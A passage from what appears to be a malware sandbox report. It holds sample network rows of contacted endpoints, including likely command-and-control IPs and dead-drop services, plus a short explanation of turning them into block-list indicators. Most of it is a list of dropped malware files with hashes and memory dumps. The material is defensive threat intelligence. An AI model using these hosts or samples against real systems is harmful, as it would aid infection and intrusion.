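        "domains": domains,
    }


# Constructed sample: rows copied (abridged) from the Network table above.
SAMPLE_NETWORK_ROWS = """\
US 8.8.8.8:53 cxcs.microsoft.net udp
DE 23.42.30.141:443 cxcs.microsoft.net tcp
US 8.8.8.8:53 201.136.101.95.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
FI 37.27.43.98:443 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 208.95.112.1:80 ip-api.com tcp
CO 181.131.217.244:30203 navegacionseguracol24vip.org tcp
US 8.8.8.8:53 condedqpwqm.shop udp
US 148.163.102.170:4782 tcp
US 148.163.102.170:4782 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
IR 5.234.67.61:40500 tcp
SY 95.212.73.0:40500 udp
KZ 92.47.143.122:40500 udp
US 162.159.128.233:443 discord.com tcp
N/A 224.0.0.251:5353 udp
"""
```

`summarize(parse_rows(SAMPLE_NETWORK_ROWS))` returns the block-list candidates in `endpoints` and `domains`, the forward DNS names the samples asked for (including the `.shop` name that never received a connection, which is itself worth keeping), the beaconing endpoint in `beacons`, and port 40500 in `fanout_ports`. The "hosting" class is deliberately kept out of the block list: those services are dead drops here, and blocking discord.com or github.com enterprise-wide is rarely the right response; a URL-level indicator from the HTTP capture is. Run it over the full table and the 40500 fan-out count climbs into the dozens, which is the shape of peer discovery or scanning rather than a single C2 server.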

Files

memory/5032-2-0x0000000000500000-0x0000000000508000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe

MD5 760370c2aa2829b5fec688d12da0535f
SHA1 269f86ff2ce1eb1eeed20075f0b719ee779e8fbb
SHA256 a3a6cde465591377afc5f656f72a00799398fd2541b60391bcb8f62b8f8cace3
SHA512 1e63051694056ffcd3aa22edb2bef3bb30401edc784b82101f5dc7f69756b994e84e309a13bdb64b6e92516e895648ee34598de70e8882569d79dbfdab61a847

memory/1204-10-0x0000000000400000-0x000000000068B000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe

MD5 51aa89efb23c098b10293527e469c042
SHA1 dc81102e0c1bced6e1da055dab620316959d8e2a
SHA256 780f11f112fcf055a2f9d6b12ce3750aed7720b85528a7adaf114067446f4292
SHA512 93230b7881a9141453c1c84e8f74085a150ce62ecd0acd80367cb16048cb9de67a7f99d1345602ad3ecd71fc2e159a4f17269f172dc7b60272f65d50e1b608fa

memory/2376-23-0x0000000000170000-0x0000000000180000-memory.dmp

memory/2376-24-0x0000000005290000-0x0000000005836000-memory.dmp

memory/2376-25-0x0000000004CE0000-0x0000000004D72000-memory.dmp

memory/2376-26-0x0000000004C30000-0x0000000004C3A000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe

MD5 f9a6811d7a9d5e06d73a68fc729ce66c
SHA1 c882143d5fde4b2e7edb5a9accb534ba17d754ef
SHA256 c583d0a367ecffa74b82b78116bbb04b7c92bed0300ed1c3adc4ef3250fbb9cc
SHA512 4dec52f0d1927306deda677fea46d103b052aaa5f7d7f49abe59a3618110ee542c2db385158a393970751fcc9687efe44a860d6330ed474c0c849369c0da56df

memory/1956-39-0x00000000004C0000-0x00000000004D0000-memory.dmp

memory/3496-40-0x0000000000B70000-0x0000000000B78000-memory.dmp

memory/3496-41-0x0000000005560000-0x00000000055FC000-memory.dmp

memory/4936-42-0x0000018332C30000-0x0000018332CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zffiq3ho.ipu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4936-52-0x000001831A500000-0x000001831A510000-memory.dmp

memory/4936-51-0x000001831A6C0000-0x000001831A6E2000-memory.dmp

memory/4936-53-0x0000018332DD0000-0x0000018332ED2000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe

MD5 ddce3b9704d1e4236548b1a458317dd0
SHA1 a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
SHA512 5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe

MD5 81bc4049ed6cb947f7c62c48a098ad98
SHA1 78d45a3b798e1b033cd9d00e49cd8057db9ce5c4
SHA256 f12132315cc4b87a04366061d26e9e61367b2472bb3e5b98fca26432dd4e21ef
SHA512 3f52973597acc5fabd0b9272e82d529de4d14e3d865caa9c3420ef70a443fed5b7b5cbfbb1f87568b6e9b5f8700e1b408579cfb39a55e9c875e32468a94fbed1

memory/3828-76-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp

MD5 a79e2717dea9776d2b876b96c5bbb50d
SHA1 b58503e92a5098a9682ad87d6a0952a1f4da2e3c
SHA256 d2c13dc08c217ea037228ea15a9bb0914843f979a4aec4b6fb9733add13756e7
SHA512 a4230b154addfc35499c45e8f35d017aa55ffad7040385a1459938f20fa36b45c3ff41fc22681d63b4fd0309582bcc7875cf61f762c5f3cae9720d69c7df30df

C:\Users\Admin\AppData\Local\Temp\is-7UAN9.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/5032-104-0x000000001BEC0000-0x000000001BF00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe

MD5 02525cd21eee24cf502f251c539c1de0
SHA1 129606f7a38a2a04b90cedb69e8fc74ae09f6377
SHA256 6ef904a0a8e3be2d9db3ed0fd128b2397cc14dc0aa6dcc24f3505e36844c0148
SHA512 3512c2ef2ebaef27412b9ce96f396f6eed7050dbf545d52ed8bf11999384eb3096dcfbcfa83a3c9597e9a842ff301387b60d82cb211cd8b2c8dbb025deb7cf8f

memory/2944-122-0x0000000000400000-0x00000000006F4000-memory.dmp

memory/2944-118-0x0000000000400000-0x00000000006F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f0e62045515b66d0a0105abc22dbf19
SHA1 894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512 f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b700dd28cad30c7ed7a7e6fc6367002
SHA1 ef00fcc0d512758d428a5c0c73c34f0c01cefdeb
SHA256 8b8532ff0ed06dd5696cdf54fc5909757444e82f5739d8402e2534e813573ddd
SHA512 8bd5d5209fce602c1bb4eacf081744a5a5524cc05d48adf9e2343f49b7a1f9e510cc859d1796d84291ba0172059ca7bd32bfd1d0840310cafb18839257bd375a

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

MD5 36a627b26fae167e6009b4950ff15805
SHA1 f3cb255ab3a524ee05c8bab7b4c01c202906b801
SHA256 a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a
SHA512 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe

MD5 ee6be1648866b63fd7f860fa0114f368
SHA1 42cab62fff29eb98851b33986b637514fc904f4b
SHA256 e17bf83e09457d8cecd1f3e903fa4c9770e17e823731650a453bc479591ac511
SHA512 d6492d3b3c1d94d6c87b77a9a248e8c46b889d2e23938ddb8a8e242caccb23e8cd1a1fbeffee6b140cf6fd3ea7e8da89190286a912032ce4a671257bd8e3e28a

memory/2148-181-0x0000000000550000-0x00000000005E0000-memory.dmp

memory/3496-182-0x0000000006720000-0x0000000006760000-memory.dmp

C:\Users\Admin\AppData\Roaming\msvcp110.dll

MD5 9bc424be13dca227268ab018dca9ef0c
SHA1 f6f42e926f511d57ef298613634f3a186ec25ddc
SHA256 59d3999d0989c9c91dae93c26499f5a14b837a0fe56e6fc29f57456f54a1f8a2
SHA512 70a1abb35bd95efc40af6653d5db2e155fab9a8575b7ae5b69ab3fbcd60925c66a675dac6cba57564a430e9b92f1a2ea9e912c4d7f356b82696ed77e92b52715

memory/4604-189-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4604-193-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4604-191-0x0000000000400000-0x0000000000465000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe

MD5 9dcf036916a9158cc7087c80374db9ae
SHA1 69d9b8ffe2c74adebe1d1dcca6f42cb394e3f045
SHA256 28773fb2aff96e836707d9ffd5e8aa706d0ce54c956fbee42b9dd9b150e997e8
SHA512 d4c585730a46f900eb691fbad746e4a7354396cf5372929afdc62198c9a6e0cabf388d1c3c72dcab3b6b07d29f89c63a327a9fb4ad34e8eedb2fc03455e17727

C:\Users\Admin\AppData\Local\Temp\Hazards

MD5 fea90ee4f7b41c990ccbfc1fe6cb36e2
SHA1 27c232073d1aae528370c5c445168c5f18a81393
SHA256 432282430dfdc908c5d10d815c2f209d2cf671729bec700c141a7c15f086a625
SHA512 12dce50983c4e5c3e88ba05a172ab611b50edc91164253e465b3c4e6db13ef825b0d57a1c0040f80aa97e4bf49eea4bc8a50d1ba897dd2470bf600b87226b71e

C:\Users\Admin\AppData\Local\Temp\Cancer

MD5 95d5c71511485e0977f79bbca432ab44
SHA1 49fc139ad863ea70aaa7b74b6c69f79421849213
SHA256 17859a0845a3aa3b871802e39aac960ca443be9a5436d4930d11602ff16a5c8c
SHA512 18ab9362ea9b876e6bf7425c0215b7ef30834cdf819de2c34ff3dd78950d22c2a6d2527e0ba8235a9ba6c5cbc8261bd4333635af1cd04e9f3e9f1ab9162fdc8c

C:\Users\Admin\AppData\Local\Temp\Karen

MD5 fc98545e276bc0ba559a0d98a374f859
SHA1 f1bdf1c5112b26b2165057c6fc0f3c00efd0ece8
SHA256 6203bcb6a49875494cbf42af8b701d68e29df5d5a4ecfbe2d5b83b3ed2e56a3f
SHA512 00e2a755b77b086233b26f2f39b7b8a0ae660ed1d890691a5e0c619ccb8f810cd91d1b3ff72b07ef65e79710d96edf766da6dd62c12e6e64c16767b4410480c9

C:\Users\Admin\AppData\Local\Temp\Sol

MD5 38728077efb1aaf4a5302ee1b642e8e6
SHA1 2c6125b8ef7cbf92a4afecbc81362bf9e112cb11
SHA256 4f0274b7c37c160b40b6f4ed1b16d3401685a2d77cc2eb5a6833f5eb211db8d6
SHA512 872d54274c0f2fa6204b354b2ab1f38646d4f208b8578a5a64bed18a216af2376b86628548918225ae35ea1255cea0453d88142b5f84015e515dacbdbb3befd4

C:\Users\Admin\AppData\Local\Temp\Variable

MD5 7e3393cad709862f92a1005bf68355c8
SHA1 5bed6c4cb4ad2bc266356dc99b122f814800a945
SHA256 97697a5494ba0cdff7bf5f6c68b7bdcb09878f49ec184de4010d550be10859cb
SHA512 a01c70c99eb9b990be8e66f97781998043570bb4de2e789669536403ba8329cdfa889f6485f8fe1422feaa5f50149cbae046da0aff121115977fab5fc401af5f

C:\Users\Admin\AppData\Local\Temp\Zinc

MD5 1d7b5851c7e933b58f5a4a94e8c2fff0
SHA1 35fdba1e3aebf7348b4478dee028904aba21e4ce
SHA256 4d3d063a5a5a079c4d4e73f96e3c9aecdef3f1a5a16621f28cdba69daee42f4d
SHA512 94e20dee259193d12d01a1188d8ff0c21346c1ff374fce9c63678c73d5520513f5b5ccd4c0bb6d6aabc29626f9f05edf184be65848ffddedb3358cb3fa8ff3d9

C:\Users\Admin\AppData\Local\Temp\Oe

MD5 77e4f81724b2590c5821fad1104a9c9d
SHA1 71b19cdffc9a001c81716236e0ba4f3332ee421e
SHA256 68d4ec5edbd9a43d0536280645c0744c3d0afdea5dbbeeb4c82d81e85f0e113b
SHA512 cbb5148937753e8450792ab36fa49fb1a38b0efcd1a7d6e72b62c7f888a04b18044f6c4da41dca259e7d37c8e6d7c687f6317bedb2853a61cdfbbb7cb635ce96

C:\Users\Admin\AppData\Local\Temp\Increases

MD5 93ad89c806c4f0764e8ec1f2da32cd00
SHA1 e2d06933fa8593eac974632c8deb105dab8a69d6
SHA256 30200f51a56ec16f0aa4ff3d6d2585556416da1c8d121644a6a70baf67ed00a9
SHA512 c60ec2af7540802fad89706e9c85348d3faf3efc2da1f662b274b3717d487c7ade374e4ca9ce1d9f91a3898e3f0e9c38c8a1d2648d9518b37bf52cdc5252e0a7

C:\Users\Admin\AppData\Local\Temp\Independently

MD5 f7e35bfd4fa836e2b29743db6b7242e6
SHA1 aafd870b2d62baa20809a1d170a3bf7aa4d60c00
SHA256 6dedc21c1f4fbd1b98ca7c9c964a4a37755a60fab376d39e8ef52343888bc5cb
SHA512 37f5ded199e3a2f9cd7ce873fe2d022a856b2c1c985f48df1bef785327a483324ffa41e1f0c21def7bb59b7d80d109e4b57c338a53c63bf2fe2c3409c6259e70

C:\Users\Admin\AppData\Local\Temp\Devon

MD5 f7e62bb95a24d3c390a038eb976ab39c
SHA1 982ef476a20d9dc2b26342b455f3ec1a4436adcc
SHA256 332f851f3454e797c9eb1ac4defadc0edcd47ffe62711142360bd8adee1989c3
SHA512 d4e6e6bee7f1b26357d9435856fbc9bac2b208e6b2a87f7b0ca925b45aad8d3157aa01cee6fa1846e09c8f036127e322ffb748bc8313201624a8d5bbdd58cc33

C:\Users\Admin\AppData\Local\Temp\Hotels

MD5 a438b2533d1f397584a64b1930d0fb47
SHA1 d49f34043b3dd87e61c293ccfd32793cb84e2c01
SHA256 45ea4b92260219f0f911a9f4e34d6e34a6acdce47bd4adabfbe6a590cbf1b180
SHA512 1aea810407fb14911bd7e9218831771ca7b5c8a25b560108387300d3a6de4b12dc9d6d3dc7590f05324a8f9418839321c34727c846b2f5e63c1a45a166989674

C:\Users\Admin\AppData\Local\Temp\Automobile

MD5 5afd0c99996c2f5b79957d7e571805be
SHA1 8f46c56d8185362fd14a708bc536febf52aab37f
SHA256 e228a8330c23b23181fad534ce378d0e595b318797f4bffb617f5a09d8084454
SHA512 c62f77e42f1dd64ace9b6837ae149b0eb775abab91476eff54d86d883babc439ea096cc8dcf2508929d46be6a362d6091ff6cffd8b2e79f00bd359cc375648e9

C:\Users\Admin\AppData\Local\Temp\Albany

MD5 c3e50ef81367a341cf75df50def52b2d
SHA1 e0b0d31d00cfa6dd3e42c004cce8f0b5e556dcc4
SHA256 64e68df4c8f3f684e45d09422adb521609539c518bb73d7749c88004573f3fa2
SHA512 94d920985b0dde1a9f8647d5c732a7add05e5a6f501b02d9d511fc07cfa62394c7e25716aa880720aef7c9c2568f696aaaa555a16ef5d5ec354fc44f2ba8ce1f

C:\Users\Admin\AppData\Local\Temp\Georgia

MD5 043e3b4e7a35b8e60502464e0c6ce00c
SHA1 c77ce7d2b27b2e8df3104b3acbf2d5c16892599e
SHA256 716e1250dcdea0c65da29317d36f57c9fbfbb08633e6602dbbf13e6045d82386
SHA512 9a113f8b8e4a5098220c65e3be85860a0911fbf7e8f665383605e3cdf5648415cd8f4c57de845ccccd4fb462a25d4a29ffb91c0da81e0bbcd0a497cb333d53b1

C:\Users\Admin\AppData\Local\Temp\Guess

MD5 508e9659524c26bece1dcb56fd4ed434
SHA1 508c414e66d6ce04c1c0f2d3c1847e340d23f0cf
SHA256 d72cb0ba935d8ff89eea87e4623e55b60993460f42ff4f5bb014cf36832139a5
SHA512 7f12cfde9840fa2721fbdc6b130ce316291b899cf83849957e2b1298192343200fc9c7d3d2826d4b30fb791a26f7e4189fcef0b08945f9ab573e1d4e0196bffc

C:\Users\Admin\AppData\Local\Temp\Funeral

MD5 6828938f1ad5b911ce73ae4ad98dfc90
SHA1 2c94d2e92256e7aacdab7e2a27466d82b70096f8
SHA256 4bddf31e02d4e2028f9938fbf0e77b1f41442141b513464529d0c53b30e92a50
SHA512 8eef0510a53033213de740c8b41c834220a8f449c208702d1ef66fffa73c311cef1499472ad43e87ecf77cac6c1448da5e3bdf42eeb71572034a98dfabb048b8

C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\33988\w

MD5 b2ff0600fda096c51d9708e2eddade53
SHA1 5e34ca4bba9741256476e79e246ed5151c073c99
SHA256 8f8a0006c93fbc5fbd31147a1b967175c964abb5f9db8f639fcfc7840b241a24
SHA512 10b548431748f7df91b37d16cca716f63f9eee93db1082d895adb4916593ef3f2051147ae07890c26976579c7bdb489c6026e39aa2e316439e85b3e469621636

memory/2944-583-0x0000000060900000-0x0000000060992000-memory.dmp

memory/1284-581-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/2944-584-0x0000000000400000-0x00000000006F4000-memory.dmp

memory/3828-580-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4396-587-0x0000000000E40000-0x0000000000EDA000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe

MD5 1aaef5ae68c230b981da07753b9f8941
SHA1 36c376f5a812492199a8cd9c69e5016ff145ef24
SHA256 71b3033574f81390983318421237ac73277410cfdd2f2f256b4c66d51b6988d6
SHA512 83852533fd0a7598e63f69ebeb29cce40f0a4bf47129d6477827a6900b46db7324c0fc433fd5abf64c040c5976e3d6574d5544669c5c45abf98945916598dcb3

C:\Users\Admin\AppData\Local\Temp\_MEI47562\ucrtbase.dll

MD5 0e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA1 4189f4459c54e69c6d3155a82524bda7549a75a6
SHA256 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512 a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

C:\Users\Admin\AppData\Local\Temp\_MEI47562\python310.dll

MD5 69d4f13fbaeee9b551c2d9a4a94d4458
SHA1 69540d8dfc0ee299a7ff6585018c7db0662aa629
SHA256 801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046
SHA512 8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

C:\Users\Admin\AppData\Local\Temp\_MEI47562\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/1440-755-0x00007FFDFC1E0000-0x00007FFDFC64E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI47562\base_library.zip

MD5 fbd6be906ac7cd45f1d98f5cb05f8275
SHA1 5d563877a549f493da805b4d049641604a6a0408
SHA256 ae35709e6b8538827e3999e61a0345680c5167962296ac7bef62d6b813227fb0
SHA512 1547b02875f3e547c4f5e15c964719c93d7088c7f4fd044f6561bebd29658a54ef044211f9d5cfb4570ca49ed0f17b08011d27fe85914e8c3ea12024c8071e8a

C:\Users\Admin\AppData\Local\Temp\_MEI47562\_ctypes.pyd

MD5 6ca9a99c75a0b7b6a22681aa8e5ad77b
SHA1 dd1118b7d77be6bb33b81da65f6b5dc153a4b1e8
SHA256 d39390552c55d8fd4940864905cd4437bc3f8efe7ff3ca220543b2c0efab04f8
SHA512 b0b5f2979747d2f6796d415dd300848f32b4e79ede59827ac447af0f4ea8709b60d6935d09e579299b3bc54b6c0f10972f17f6c0d1759c5388ad5b14689a23fe

C:\Users\Admin\AppData\Local\Temp\_MEI47562\libffi-7.dll

MD5 b5150b41ca910f212a1dd236832eb472
SHA1 a17809732c562524b185953ffe60dfa91ba3ce7d
SHA256 1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a
SHA512 9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

C:\Users\Admin\AppData\Local\Temp\_MEI47562\python3.dll

MD5 c17b7a4b853827f538576f4c3521c653
SHA1 6115047d02fbbad4ff32afb4ebd439f5d529485a
SHA256 d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68
SHA512 8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7

memory/4488-771-0x0000000000400000-0x0000000000458000-memory.dmp

memory/1440-777-0x00007FFDFC0B0000-0x00007FFDFC16C000-memory.dmp

memory/1440-776-0x00007FFDFC170000-0x00007FFDFC19E000-memory.dmp

memory/1440-775-0x00007FFE14670000-0x00007FFE1467D000-memory.dmp

memory/1440-778-0x00007FFDFC080000-0x00007FFDFC0AB000-memory.dmp

memory/4488-774-0x0000000000400000-0x0000000000458000-memory.dmp

memory/4488-772-0x0000000000400000-0x0000000000458000-memory.dmp

memory/1440-770-0x00007FFE146C0000-0x00007FFE146CD000-memory.dmp

memory/1440-769-0x00007FFE01250000-0x00007FFE01269000-memory.dmp

memory/1440-768-0x00007FFDFC1A0000-0x00007FFDFC1D4000-memory.dmp

memory/1440-767-0x00007FFE01270000-0x00007FFE0129D000-memory.dmp

memory/1440-766-0x00007FFE089F0000-0x00007FFE08A09000-memory.dmp

memory/1440-765-0x00007FFE14770000-0x00007FFE1477F000-memory.dmp

memory/1440-764-0x00007FFE02B90000-0x00007FFE02BB4000-memory.dmp

memory/1440-781-0x00007FFDFC030000-0x00007FFDFC072000-memory.dmp

memory/1440-782-0x00007FFE142D0000-0x00007FFE142DA000-memory.dmp

memory/1440-783-0x00007FFDFBFE0000-0x00007FFDFBFFC000-memory.dmp

memory/1440-784-0x00007FFDFC1E0000-0x00007FFDFC64E000-memory.dmp

memory/1440-787-0x00007FFDFBF60000-0x00007FFDFBF8E000-memory.dmp

memory/1440-786-0x00007FFDFBEA0000-0x00007FFDFBF58000-memory.dmp

memory/1440-785-0x00007FFDFB9E0000-0x00007FFDFBD55000-memory.dmp

memory/1440-788-0x00007FFE02B90000-0x00007FFE02BB4000-memory.dmp

memory/1440-789-0x00007FFDFBE80000-0x00007FFDFBE94000-memory.dmp

memory/1440-792-0x00007FFE141B0000-0x00007FFE141BB000-memory.dmp

memory/1440-794-0x00007FFDFBE30000-0x00007FFDFBE4F000-memory.dmp

memory/1440-793-0x00007FFE01250000-0x00007FFE01269000-memory.dmp

memory/1440-790-0x00007FFDFBE50000-0x00007FFDFBE77000-memory.dmp

memory/1440-791-0x00007FFDFB8C0000-0x00007FFDFB9D8000-memory.dmp

memory/1440-800-0x00007FFE13900000-0x00007FFE1390C000-memory.dmp

memory/1440-803-0x00007FFE100A0000-0x00007FFE100AB000-memory.dmp

memory/1440-809-0x00007FFDFB8A0000-0x00007FFDFB8AB000-memory.dmp

memory/1440-808-0x00007FFDFB8B0000-0x00007FFDFB8BC000-memory.dmp

memory/1440-807-0x00007FFDFBE20000-0x00007FFDFBE2C000-memory.dmp

memory/1440-806-0x00007FFE01240000-0x00007FFE0124E000-memory.dmp

memory/1440-805-0x00007FFE02F80000-0x00007FFE02F8D000-memory.dmp

memory/1440-804-0x00007FFE0D130000-0x00007FFE0D13C000-memory.dmp

memory/1440-802-0x00007FFE11460000-0x00007FFE1146C000-memory.dmp

memory/1440-801-0x00007FFE137B0000-0x00007FFE137BB000-memory.dmp

memory/1440-798-0x00007FFE13C60000-0x00007FFE13C6B000-memory.dmp

memory/1440-824-0x00007FFDFB300000-0x00007FFDFB332000-memory.dmp

memory/1440-829-0x00007FFDFB2B0000-0x00007FFDFB2D9000-memory.dmp

memory/1440-828-0x00007FFDFB4C0000-0x00007FFDFB4CC000-memory.dmp

memory/1440-827-0x00007FFDFB4D0000-0x00007FFDFB4DB000-memory.dmp

memory/1440-826-0x00007FFDFBF60000-0x00007FFDFBF8E000-memory.dmp

memory/1440-825-0x00007FFDFB2E0000-0x00007FFDFB2FE000-memory.dmp

memory/1440-823-0x00007FFDFB340000-0x00007FFDFB351000-memory.dmp

memory/1440-822-0x00007FFDFB360000-0x00007FFDFB3AD000-memory.dmp

memory/1440-821-0x00007FFDFB3B0000-0x00007FFDFB3C8000-memory.dmp

memory/1440-820-0x00007FFDFB3D0000-0x00007FFDFB3EB000-memory.dmp

memory/1440-819-0x00007FFDFB3F0000-0x00007FFDFB412000-memory.dmp

memory/1440-818-0x00007FFDFB420000-0x00007FFDFB434000-memory.dmp

memory/1440-817-0x00007FFDFB440000-0x00007FFDFB450000-memory.dmp

memory/1440-816-0x00007FFDFB450000-0x00007FFDFB465000-memory.dmp

memory/1440-815-0x00007FFDFB470000-0x00007FFDFB47C000-memory.dmp

memory/1440-814-0x00007FFDFB480000-0x00007FFDFB492000-memory.dmp

memory/1440-813-0x00007FFDFB4A0000-0x00007FFDFB4AD000-memory.dmp

memory/1440-812-0x00007FFDFB4B0000-0x00007FFDFB4BC000-memory.dmp

memory/1440-811-0x00007FFDFBEA0000-0x00007FFDFBF58000-memory.dmp

memory/1440-810-0x00007FFDFB9E0000-0x00007FFDFBD55000-memory.dmp

memory/1440-797-0x00007FFDFC0B0000-0x00007FFDFC16C000-memory.dmp

memory/1440-799-0x00007FFE13B50000-0x00007FFE13B5B000-memory.dmp

memory/1440-796-0x00007FFE146C0000-0x00007FFE146CD000-memory.dmp

memory/1440-795-0x00007FFDFB4E0000-0x00007FFDFB651000-memory.dmp

memory/1440-835-0x00007FFDFB000000-0x00007FFDFB252000-memory.dmp

memory/1440-834-0x00007FFDFB8C0000-0x00007FFDFB9D8000-memory.dmp

memory/1440-833-0x00007FFDFBE50000-0x00007FFDFBE77000-memory.dmp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\downloads_db

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\downloads_db

